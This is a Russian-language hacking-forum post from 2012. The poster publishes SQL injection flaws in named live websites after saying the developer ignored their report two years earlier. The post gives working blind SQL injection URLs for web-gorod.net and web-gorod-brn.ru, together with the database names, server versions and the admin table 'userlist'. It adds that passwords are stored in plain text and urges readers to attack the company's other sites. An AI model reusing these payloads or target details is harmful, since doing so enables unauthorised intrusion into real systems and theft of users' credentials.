08.08.2012, 20:52
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
С болью на сердце и злобой на сисадминов выкладываю эти скули. Работал в сотрудничащей фирме, позвонил им в 2010 году и сообщил про уязвимости в движке, буквально ткнул носом.
Сказали, да-да, всё исправим...
Two years later... А воз и ныне там...
Сайт web-gorod.net
Код:
_ttp://web-gorod.net/index.php?id=9999'+/*+or+ascii(substring((database()),0,1))=79+and*/+'x'='x
5.5.3-55
DB = pzdobnin_wg
Таблица с админами = userlist
Сайт web-gorod-brn.ru
Код:
_ttp://web-gorod-brn.ru/view_post.php?cat=16&id=9999'+/*+or+ascii(substring((database()),0,1))=79+and*/+'x'='x
5.1.50-lk-log
DB = webgorodru
Таблица с админами = userlist
На главном сайте ещё куча всяких городов... Разбирайте.
Пассы в plain-text
|
|
|